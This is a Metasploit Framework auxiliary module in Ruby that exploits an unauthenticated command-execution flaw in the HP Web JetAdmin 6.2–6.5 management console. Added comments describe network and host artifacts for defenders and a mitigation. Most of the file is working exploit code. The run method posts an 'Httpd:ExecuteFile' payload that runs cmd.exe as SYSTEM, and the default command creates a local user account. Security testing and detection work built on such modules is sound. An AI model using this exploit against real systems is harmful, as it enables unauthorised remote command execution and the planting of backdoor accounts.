
root / modules / auxiliary / admin / http / hp_web_jetadmin_exec.rb @ master


##
# $Id$
##

    
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

    

    
require 'msf/core'

    

    
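# Auxiliary module for the unauthenticated command-execution flaw in the
# web management console of HP Web JetAdmin (affected versions and impact
# are given in 'Description'; advisories are listed in 'References').
#
# Review notes for defenders, derived from the request that #run builds:
# - Network artifact: a single POST to /plugins/framework/script/content.hts
#   on the console port (default 8000) whose body begins with
#   "obj=Httpd:ExecuteFile(" and names cmd.exe. No credentials or session
#   are sent, which matches the "without authentication" claim below.
# - Host artifact: presumably a cmd.exe process started by the Web JetAdmin
#   service account (SYSTEM per the description); with the default CMD the
#   command is a local account creation, so account-management audit events
#   are a second signal -- confirm both against a test install.
# - Mitigation: the console should not be reachable from untrusted networks;
#   the description lists v6.2 - v6.5 as affected, so hosts on those
#   versions need the vendor's fixed release.
class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::HttpClient

        # Registers the module metadata and its two options.
        #
        # @param info [Hash] metadata supplied by the framework; merged with
        #   the values below through update_info.
        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
                        'Description'    => %q{
                                This module abuses a command execution vulnerability within the
                                web based management console of the Hewlett-Packard Web JetAdmin
                                network printer tool v6.2 - v6.5. It is possible to execute commands
                                as SYSTEM without authentication. The vulnerability also affects POSIX
                                systems, however at this stage the module only works against Windows.
                                This module does not apply to HP printers.
                        },
                        'Author'         => [ 'patrick' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision$',
                        'References'     =>
                                [
                                        [ 'OSVDB', '5798' ],
                                        [ 'BID', '10224' ],
                                        # No CVE identifier is recorded for this issue here.
                                        #[ 'CVE', '' ],
                                        [ 'URL', 'http://www.milw0rm.com/exploits/294' ],
                                ],
                        'DisclosureDate' => 'Apr 27 2004'))

                # RPORT defaults to 8000, the console port this module targets.
                # CMD is declared optional (the `false` flag), so it can be
                # unset by the operator; #run checks for that case.
                register_options(
                        [
                                Opt::RPORT(8000),
                                OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),
                        ], self.class)
        end

        # Sends the single request described in the class comment.
        #
        # The response is not inspected, so the module gives no indication of
        # whether the target accepted or rejected the request.
        #
        # @return [Object, nil] whatever send_request_cgi returns, or nil when
        #   CMD is unset or empty and nothing is sent.
        def run
                # CMD is optional; without this check an unset option reached
                # String#gsub as nil and the run ended in a NoMethodError.
                command = datastore['CMD'].to_s
                if command.empty?
                        print_error('CMD is not set; nothing to send.')
                        return
                end

                # The request body separates the ExecuteFile arguments with
                # commas, so every space in CMD becomes an argument boundary.
                # NOTE(review): a CMD that itself contains a comma, or a quoted
                # argument with spaces, is presumably not passed through intact.
                arguments = command.gsub(' ', ',')

                # Second argument is the response timeout in seconds.
                send_request_cgi({
                                'uri'     => '/plugins/framework/script/content.hts',
                                'method'  => 'POST',
                                'data'    => 'obj=Httpd:ExecuteFile(,cmd.exe,/c,' + arguments + ',)'
                        }, 3)
        end

end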